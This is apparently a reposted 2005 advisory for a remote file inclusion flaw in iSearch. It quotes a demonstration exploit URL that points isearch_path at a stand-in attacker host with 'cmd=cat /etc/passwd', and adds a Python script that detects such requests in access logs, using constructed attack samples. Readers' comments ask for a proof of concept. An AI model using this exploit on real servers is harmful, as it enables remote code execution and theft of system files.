Friday, December 09, 2005

How To 8

'isearch.inc.php' includes the following files relative to the user-supplied $isearch_path variable:

isearch_core.inc.php
isearch_spider.inc.php
isearch_search.inc.php

A remote user can reportedly supply a specially crafted URL that will include arbitrary PHP code from a remote location and execute the code on the target system. The code, including operating system commands, will execute with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/isearch/isearch.inc.php?isearch_path=http://[attacker]?&cmd=cat /etc/passwd

The author indicates that this vulnerability was reported by blackcobra-x.

Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

Solution: No solution was available at the time of this entry.

Vendor URL: www.isearchthenet.com/isearch/index.php

Cause: Input validation error, State error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: taktau@taktau.cc
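
Because no fix was available at the time of the entry, one practical check is to search web server access logs for requests to isearch.inc.php that pass a remote URL in isearch_path. The following Python check is an added example, not part of the original advisory or of the iSearch code; the combined access log format, the constructed sample log lines and the function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameter and script name as given in the advisory.
PARAM = "isearch_path"
SCRIPT = "isearch.inc.php"
# A value that starts with a URL scheme, "//" or a UNC prefix is not a local include path.
# Two or more scheme characters are required so a Windows drive letter is not flagged.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|//|\\\\)", re.I)
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+)[^"]*"')


def remote_include_value(target):
    """Return the remote isearch_path value in a request target, or None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(SCRIPT):
        return None
    # parse_qsl percent-decodes once, so encoded schemes (http%3A%2F%2F) are seen too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == PARAM and REMOTE.match(value):
            return value
    return None


def scan(lines):
    """Return (line_number, value) for each log line carrying a remote isearch_path."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        value = remote_include_value(match.group(1)) if match else None
        if value is not None:
            hits.append((number, value))
    return hits


# Constructed sample log lines (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Dec/2005:10:01:02 +0000] "GET /isearch/index.php?s=linux HTTP/1.1" 200 5120',
    '198.51.100.7 - - [09/Dec/2005:10:02:13 +0000] "GET /isearch/isearch.inc.php?isearch_path=http://files.example.test/?&cmd=id HTTP/1.1" 200 312',
    '198.51.100.7 - - [09/Dec/2005:10:02:40 +0000] "GET /isearch/isearch.inc.php?isearch_path=ftp%3A%2F%2Ffiles.example.test%2Fa HTTP/1.1" 200 98',
    '192.0.2.44 - - [09/Dec/2005:10:03:05 +0000] "GET /isearch/isearch.inc.php?isearch_path=./ HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: remote include path {value!r}")
```

Only the query string is inspected, so a value delivered in a POST body or cookie will not appear in an access log and needs a different data source.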

2 comments:

Anonymous said...

why won't it work, huh

Anonymous said...

Injection takes patience and luck. Btw, if possible, share the injection PoC here as well, so that we can all clearly understand the injection mechanism. Good job dude!
